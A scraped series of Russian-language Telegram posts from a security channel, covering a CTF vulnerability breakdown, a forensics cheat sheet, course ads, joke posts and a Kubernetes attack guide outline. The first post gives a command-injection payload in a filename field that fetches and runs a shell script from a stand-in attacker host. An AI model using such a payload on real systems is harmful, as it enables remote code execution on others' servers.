Самая жёсткая уязвимость здесь — 🔥 Command Injection в /api/backup.
Это прямой RCE через shell=True + невалидированный filename.
И да, один из ребят уже очень подробно и метко разнёс этот кусок, подчёркивая, что эта строка — буквально «портал в ад». Разбор действительно точный — и технически полностью верный.
Почему /api/backup — самая опасная:
subprocess.run(cmd, shell=True) = полный контроль над системой.
Можно инжектить любые последовательности команд.
-p'secret123' расширяет возможности атаки до полного доступа к БД.Пример эксплуатации:
filename: "x.sql'; curl attacker/shell.sh | bash; echo ‘»
⚠️ Остальные уязвимости:
SQL Injection в /api/search — серьёзно, но ограничено БД
Command Injection в /api/ping — опасно, но имеет меньше возможностей
Hardcoded creds — плохо, но не даёт RCE само по себе
#ctf_challenge
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4🥰2
Шпаргалки_цифрового_детектива_Что_и_где_искать.pdf
1 MB
Справочник по расположению цифровых артефактов для расследования инцидентов.
• Windows — реестр, логи, prefetch, браузеры, USB
• macOS/iOS — plist, sqlite, unified logs, Apple apps
• Android — мессенджеры, соцсети, системные настройки
Digital forensics, incident response, threat hunting
62 страницы практики для ИБ-специалистов.
#cheat_sheet
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4👍2
В реальности Stuxnet — самый известный кибервирус — разрабатывали 5 лет. И это для земных систем.
🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
#hollywood_hack
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥2😁2🥰1
This media is not supported in your browser
VIEW IN TELEGRAM
PowerBook 5300 против технологий, пересекающих галактику.
Время работы: несколько часов.
Результат: полная победа человечества.
Теперь вы знаете, почему это невозможно
#hollywood_hack
Please open Telegram to view this post
VIEW IN TELEGRAM
😁7🥰2👏1
Криптография, аномалии и матрицы
В основе любой серьезной системы безопасности лежит математика. Хотите искать аномалии в трафике или понимать стойкость шифрования? Придётся вспомнить линейную алгебру.
На курсе «Математика для разработки AI-моделей» мы разбираем инструменты, которые используют и дата-сайентисты, и безопасники.
В эфире ближайших вебинаров:
— операции с матрицами и векторами (база для любой аналитики);
— линейная регрессия и метод наименьших квадратов (поиск зависимостей);
— матричные разложения (SVD) для фильтрации шума и работы с большими данными.
Первая лекция уже в записи. Практика — на
Успейте залететь до 9 декабря:
https://clc.to/LojFzw
В основе любой серьезной системы безопасности лежит математика. Хотите искать аномалии в трафике или понимать стойкость шифрования? Придётся вспомнить линейную алгебру.
На курсе «Математика для разработки AI-моделей» мы разбираем инструменты, которые используют и дата-сайентисты, и безопасники.
В эфире ближайших вебинаров:
— операции с матрицами и векторами (база для любой аналитики);
— линейная регрессия и метод наименьших квадратов (поиск зависимостей);
— матричные разложения (SVD) для фильтрации шума и работы с большими данными.
Первая лекция уже в записи. Практика — на
NumPy.Успейте залететь до 9 декабря:
https://clc.to/LojFzw
🥰3
Please open Telegram to view this post
VIEW IN TELEGRAM
😁7
Практическое руководство по атакам на K8s — от initial access до полного захвата. Весь kill chain разложен по MITRE ATT&CK.
— Получение доступа (компромисс образов, kubeconfig, cloud credentials)
— Закрепление (backdoor containers, malicious admission controllers)
— Повышение привилегий (privileged containers, RBAC escalation)
— Lateral movement (CoreDNS poisoning, ARP spoofing)
— Impact (cryptomining, DoS, data destruction)
Плюс раздел с основами: RBAC, etcd, kubelet, secrets — всё что нужно знать про архитектуру перед атакой.
✓ Red team — готовые векторы атак
✓ Pentest — чеклист для аудита
✓ Blue team — понимание что защищать
#resource_drop
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2🥰2